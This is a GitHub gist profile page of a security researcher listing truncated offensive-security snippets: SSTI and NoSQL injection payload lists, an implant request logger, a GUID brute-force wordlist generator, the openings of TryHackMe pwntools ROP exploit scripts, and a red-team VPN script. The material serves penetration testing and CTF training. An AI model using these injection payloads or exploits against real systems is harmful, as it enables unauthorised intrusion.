Skip to content

Instantly share code, notes, and snippets.

View DanaEpp's full-sized avatar
☠️
Flippin' duh bits. Dumping core.

Dana Epp DanaEpp

☠️
Flippin' duh bits. Dumping core.
View GitHub Profile
@DanaEpp
DanaEpp / ssti-payloads.txt
Created August 22, 2023 22:31
SSTI template expression payloads
View ssti-payloads.txt
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
@DanaEpp
DanaEpp / request_logger.py
Last active August 11, 2023 14:55
Implant Request Logger
View request_logger.py
#!/bin/env python3
"""
request_logger.py
A simple HTTP server that will dump the requests being mirrored from an implant on an API server
WARNING: This will record all header and body content of a request to a JSON file. To reduce the risk of
information disclosure, care should be placed in the ACL of the output file.
@DanaEpp
DanaEpp / dump-endpoints.jq
Created November 26, 2022 00:05
jq query and filter to dump the HTTP method, route and description of every endpoint in an OpenAPI 3.0 document. Usage: jq -r -f dump-endpoints.jq openapidoc.json
View dump-endpoints.jq
.paths | to_entries | map(select(.key | test("^x-") | not)) | map ( .key as $path | .value | to_entries | map( select( .key | IN("get", "put", "post", "delete", "options", "head", "patch", "trace")) | { method: .key, path: $path, summary: .value.summary?, deprecated: .value.deprecated? })[] ) | map( .method + "\t" + .path + "\t" + .summary + (if .deprecated then " (deprecated)" else "" end)) []
@DanaEpp
DanaEpp / guid_reaper.py
Created October 20, 2022 17:56
Tool to dump v1 GUIDs and generate a wordlist of GUIDs for use in bruteforce attacks against APIs with predictable GUIDs
View guid_reaper.py
#!/bin/env python3
import argparse
import datetime
import re
import sys
import uuid
###############################################################################
# Based off of Daniel Thatcher's guid tool
@DanaEpp
DanaEpp / nosql-injection-payloads-for-postman.json
Created September 20, 2022 22:18
NoSQL injection payloads for Postman
View nosql-injection-payloads-for-postman.json
[
{"payload":"'"},
{"payload":"''"},
{"payload":";%00"},
{"payload":"--"},
{"payload":"-- -"},
{"payload":"\"\""},
{"payload":";"},
{"payload":"' OR '1"},
{"payload":"' OR 1 -- -"},
@DanaEpp
DanaEpp / thm-dump.py
Created June 26, 2022 05:18
TryHackMe (THM) dump script to find rooms with open tasks
View thm-dump.py
#!/bin/env python3
import getpass
import time
import requests
from requests.cookies import create_cookie
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import re
from typing import List
@DanaEpp
DanaEpp / exploit110.py
Last active May 10, 2022 23:43
THM PWN 101 - Challenge 10 (optimized using pwntools native ROP() chains)
View exploit110.py
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn110.pwn110"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
@DanaEpp
DanaEpp / gist:18500ab8c14893da46ae095678a12f43
Last active May 7, 2022 22:10
THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
View gist:18500ab8c14893da46ae095678a12f43
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn109.pwn109"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
@DanaEpp
DanaEpp / setup_vpn.sh
Created May 12, 2021 22:26
My disposable VPN script I use during external #redteam engagements
View setup_vpn.sh
#!/bin/bash
# Author: Dana Epp (@danaepp)
GROUP_NAME="DisposableVPN"
VM_NAME="DisposableVPN"
REGION="canadacentral"
PORT="51820"
echo "Creating resource group '$GROUP_NAME'..."
@DanaEpp
DanaEpp / gen_badchars.py
Last active May 10, 2021 02:00
Quick script to generate badchars array during exploit development
View gen_badchars.py
#!/usr/bin/env python3
import sys
sys.stdout.write("badchars = (\n\tb\"")
pos = 0
for x in range(0,256):
sys.stdout.write( "\\x" + '{0:02x}'.format(x))
if pos == 15: